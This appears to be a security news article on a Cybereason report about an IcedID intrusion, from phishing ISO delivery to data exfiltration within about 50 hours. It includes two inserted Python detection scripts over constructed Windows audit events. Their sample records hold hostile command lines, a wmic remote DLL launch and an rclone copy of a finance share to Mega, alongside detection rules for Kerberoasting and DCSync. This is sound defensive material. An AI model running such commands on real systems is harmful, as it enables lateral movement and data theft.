Threat attackers can own your data in just two days


Cybereason's report shows that cybercriminals need only a couple of days to gain access to a full corporate network and exfiltrate its data. Read on to learn more.
New research from Cybereason exposes how quickly cybercriminals can exploit an initial infection of a corporate user's machine.

IcedID is a banking Trojan that has been actively used by cybercriminals since 2017. It shares part of its code with another widely used malware family, Pony, whose source code leaked in 2015.
While mostly distributed via spam emails built to infect users, IcedID was also delivered in the beginning of 2023 by a phishing campaign pretending to spread a Zoom software update.
IcedID has also frequently been distributed as a payload by the infamous Emotet and Trickbot infrastructure, and used to run ransomware attacks, as exposed by the FBI.
In this attack campaign, users receive and open a password-protected archive containing an ISO file. Opening the ISO file mounts it as a virtual disk. If the user then clicks the only visible file, a Windows shortcut (LNK) file, the shortcut starts the infection process by launching a batch file.
The batch file drops a Dynamic Link Library (DLL) file that is executed from a temporary directory. The DLL then downloads the IcedID payload from a remote server and loads it into the process (Figure A).

The malware then uses the legitimate net.exe binary from the infected system to collect information about the domain, the workstation and the members of the Domain Admins group.
Persistence is established by creating a scheduled task on the computer, which executes the malware every hour and at each logon operation.
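The persistence step above is one of the easier parts of this chain to catch, because Windows logs the full task definition when a scheduled task is created (Security event 4698). The following is an added example, not code from Cybereason or TechRepublic: it parses the task XML carried in constructed 4698 records and flags tasks that combine a logon trigger, an hourly repetition and an action that runs from a temporary directory. The task names, the rundll32 loader and the DLL path in the sample are hypothetical.

```python
"""Flag newly created scheduled tasks (Windows Security event 4698) whose
triggers match the persistence pattern described above: run every hour and at
every logon, with an action pointing at a temporary directory.
Added example, not Cybereason's or TechRepublic's code. The events below are
constructed; task names, the rundll32 loader and the DLL path are hypothetical."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Constructed 4698 records. "TaskContent" is the task XML Windows logs on creation.
SAMPLE_EVENTS = [
    {"EventID": 4698, "SubjectUserName": "jdoe", "TaskName": "\\UpdateCheck",
     "TaskContent": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT1H</Interval></Repetition>
      <StartBoundary>2023-01-10T09:00:00</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Actions>
    <Exec>
      <Command>rundll32.exe</Command>
      <Arguments>C:\\Users\\jdoe\\AppData\\Local\\Temp\\loader.dll,PluginInit</Arguments>
    </Exec>
  </Actions>
</Task>"""},
    {"EventID": 4698, "SubjectUserName": "SYSTEM",
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger><ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger>
  </Triggers>
  <Actions><Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h -o</Arguments></Exec></Actions>
</Task>"""},
]

# Paths an attacker-dropped loader typically lives in; legitimate system tasks rarely do.
TEMP_PATH = re.compile(r"(\\temp\\|\\appdata\\local\\)", re.IGNORECASE)


@dataclass
class Finding:
    task_name: str
    created_by: str
    reasons: list = field(default_factory=list)


def analyse_task(event):
    """Return a Finding listing every suspicious trait of one 4698 event."""
    root = ET.fromstring(event["TaskContent"])
    finding = Finding(event["TaskName"], event["SubjectUserName"])
    triggers = root.find(TASK_NS + "Triggers")
    if triggers is not None:
        if triggers.find(TASK_NS + "LogonTrigger") is not None:
            finding.reasons.append("runs at every logon")
        for trig in triggers.findall(TASK_NS + "TimeTrigger"):
            interval = trig.findtext(f"{TASK_NS}Repetition/{TASK_NS}Interval")
            if interval == "PT1H":
                finding.reasons.append("repeats every hour")
    for exe in root.iter(TASK_NS + "Exec"):
        parts = (exe.findtext(TASK_NS + "Command"), exe.findtext(TASK_NS + "Arguments"))
        cmdline = " ".join(p for p in parts if p)
        if TEMP_PATH.search(cmdline):
            finding.reasons.append("action runs a file from a temporary directory")
    return finding


def suspicious_tasks(events, min_reasons=2):
    """Keep tasks showing at least min_reasons traits, so ordinary hourly jobs are not flagged."""
    candidates = (analyse_task(e) for e in events if e["EventID"] == 4698)
    return [f for f in candidates if len(f.reasons) >= min_reasons]


if __name__ == "__main__":
    for f in suspicious_tasks(SAMPLE_EVENTS):
        print(f"{f.task_name} (created by {f.created_by}): " + "; ".join(f.reasons))
```

Requiring two traits rather than one keeps the rule quiet on the many legitimate hourly or logon-triggered tasks Windows and business software create; the combination with an action launched from a user-writable temporary directory is what makes the sample task stand out.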
Cybereason researchers also documented how quickly cybercriminals move once they have initial access to a company.
Once the initial IcedID infection is complete, an interactive command line (cmd.exe) session is started and used to download additional files onto the infected system. Seven minutes after the initial infection, a Cobalt Strike beacon is running on the infected computer. The Cobalt Strike code loads Rubeus, a tool designed for Kerberos interaction and abuse, which also collects more network data from the system. Fifteen minutes after the initial infection, the attackers obtain the credentials of a service account via Kerberoasting, a known technique that abuses valid Kerberos service tickets.
Fifty-seven minutes after the infection, lateral movement starts. The attacker uses the legitimate command line tool ping.exe from the system to check whether a host is alive, then executes the same Cobalt Strike payload on the remote workstation via wmic.exe. That process is repeated several times, each time pivoting to a different endpoint or server, and large portions of the network infrastructure are scanned.
A DCSync attack is performed 19 hours after the initial compromise. This technique allows an attacker to impersonate a domain controller in order to obtain password hashes from other domain controllers, enabling the attacker to extend their foothold across every domain of the targeted company.
Forty-six hours after the initial infection, and shortly before exfiltration starts, the attackers deploy the legitimate Atera remote administration tool on several different machines. Installing that tool on several computers lets the attackers return to the network even if the IcedID malware is discovered and removed from the computers.
The IcedID malware hooks into several web browsers to steal credentials, session cookies and saved information. In addition, the attackers used the legitimate rclone file syncing tool to encrypt and send several directories of their choosing to the Mega file sharing service. This data exfiltration starts roughly 50 hours after the initial compromise.
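Each of the post-infection steps described above (Kerberoasting, lateral movement through wmic.exe, DCSync and the rclone upload) leaves a recognisable trace in standard Windows audit logs. The following is an added example, not code from Cybereason or TechRepublic: a small detection pass over constructed Security event records (4769 service-ticket requests, 4688 process creations and 4662 directory-object access) that flags each step and measures the elapsed time from the first detection to exfiltration. The host names, user names, IP address and file paths in the sample are hypothetical; the two replication GUIDs are well-known Active Directory control-access rights.

```python
"""Detection pass over the intrusion steps described above: Kerberoasting
(event 4769 requesting an RC4 service ticket for a user-account SPN), WMIC
remote process creation (4688), DCSync (4662 exercising directory-replication
rights from a non-machine account) and an rclone upload to a cloud remote (4688).
Added example, not Cybereason's or TechRepublic's code; every record below is
constructed and the hosts, users, IP and paths are hypothetical."""
import re
from dataclasses import dataclass
from datetime import datetime

# Control-access-right GUIDs a DCSync caller needs (well-known AD schema values).
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC service tickets
# rclone remote syntax such as "mega:folder"; a drive letter like "C:\" has only one char before ":".
RCLONE_REMOTE = re.compile(r"^[a-z][a-z0-9_-]+:", re.IGNORECASE)


@dataclass
class Finding:
    when: datetime
    technique: str
    detail: str


SAMPLE_EVENTS = [  # constructed records, in chronological order
    {"ts": "2023-01-10T09:00:00", "EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc-sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.5.23"},
    {"ts": "2023-01-10T09:01:00", "EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "WS-017$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.5.23"},
    {"ts": "2023-01-10T09:42:00", "EventID": 4688, "SubjectUserName": "jdoe",
     "NewProcessName": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": 'wmic /node:WS-042 process call create "rundll32.exe C:\\Windows\\Temp\\b.dll,Start"'},
    {"ts": "2023-01-11T04:00:00", "EventID": 4662, "SubjectUserName": "svc-sql",
     "Properties": f"{{{REPL_GET_CHANGES}}} {{{REPL_GET_CHANGES_ALL}}}"},
    {"ts": "2023-01-12T11:00:00", "EventID": 4688, "SubjectUserName": "svc-sql",
     "NewProcessName": "C:\\ProgramData\\rclone.exe",
     "CommandLine": "rclone.exe copy C:\\Shares\\Finance mega:exfil -q"},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def detect_kerberoast(e):
    """RC4 ticket for a non-machine, non-krbtgt SPN: the classic Kerberoasting signal."""
    svc = e["ServiceName"]
    if e["TicketEncryptionType"] == RC4_HMAC and svc.lower() != "krbtgt" and not svc.endswith("$"):
        return Finding(_ts(e), "kerberoasting",
                       f"RC4 service ticket for {svc} requested by {e['TargetUserName']} from {e['IpAddress']}")
    return None


def detect_process(e):
    """Process creations matching the lateral movement and exfiltration steps."""
    exe = e["NewProcessName"].rsplit("\\", 1)[-1].lower()
    cmd = e["CommandLine"]
    args = cmd.split()
    if exe == "wmic.exe" and any(a.lower().startswith("/node:") for a in args) \
            and "process call create" in cmd.lower():
        return Finding(_ts(e), "lateral_movement_wmic", f"{e['SubjectUserName']} ran: {cmd}")
    if exe == "rclone.exe" and len(args) > 1 and args[1] in ("copy", "sync", "move") \
            and any(RCLONE_REMOTE.match(a) for a in args[2:]):
        return Finding(_ts(e), "exfiltration_rclone", f"{e['SubjectUserName']} ran: {cmd}")
    return None


def detect_dcsync(e):
    """Replication rights exercised by an account that is not a domain controller."""
    props = e.get("Properties", "").lower()
    if REPL_GET_CHANGES in props and REPL_GET_CHANGES_ALL in props \
            and not e["SubjectUserName"].endswith("$"):
        return Finding(_ts(e), "dcsync", f"{e['SubjectUserName']} requested directory replication")
    return None


HANDLERS = {4769: detect_kerberoast, 4688: detect_process, 4662: detect_dcsync}


def run_detections(events):
    """Apply the per-event handlers and return findings ordered by time."""
    findings = []
    for e in events:
        handler = HANDLERS.get(e["EventID"])
        finding = handler(e) if handler else None
        if finding:
            findings.append(finding)
    return sorted(findings, key=lambda f: f.when)


def hours_to_exfiltration(findings):
    """Hours from the first detection to the first exfiltration finding, or None."""
    exfil = [f for f in findings if f.technique == "exfiltration_rclone"]
    if not findings or not exfil:
        return None
    return (exfil[0].when - findings[0].when).total_seconds() / 3600


if __name__ == "__main__":
    found = run_detections(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.when:%Y-%m-%d %H:%M} {f.technique}: {f.detail}")
    print(f"time to exfiltration: {hours_to_exfiltration(found)} h")
```

Two practical caveats: the 4688 checks depend on process command-line auditing being enabled (otherwise CommandLine is empty), and the 4662 check only fires if the domain controllers audit directory-service access for the domain object. The constructed timeline deliberately spans 50 hours, the same window the report describes, to show how little time a defender has between the first Kerberoasting signal and the upload.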
Cybereason shows how quickly threat actors can move laterally between computers within a target network and exfiltrate data from them. While several of the reported techniques can be carried out automatically without human intervention, the lateral movement and exfiltration stages require more human involvement. It is concerning to see that a threat actor can do all of this in only 50 hours.
The report notes that the final step is data exfiltration, but the attack could easily lead to a ransomware demand. The tooling and TTPs described by Cybereason are reminiscent of the OnePercent group, which used IcedID, Cobalt Strike, PowerShell and rclone in a manner similar to the actions documented in this report.
Keep all operating systems and software up to date and patched to prevent compromise through a known vulnerability. Do not allow users on the network to open ISO files unless strictly needed; that file type should only be allowed for administrators.
Finally, security solutions need to be deployed on all endpoints and servers to detect suspicious behavior. Security awareness training should be provided to all employees, especially on email threats, which remain the most prevalent initial infection vector.
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.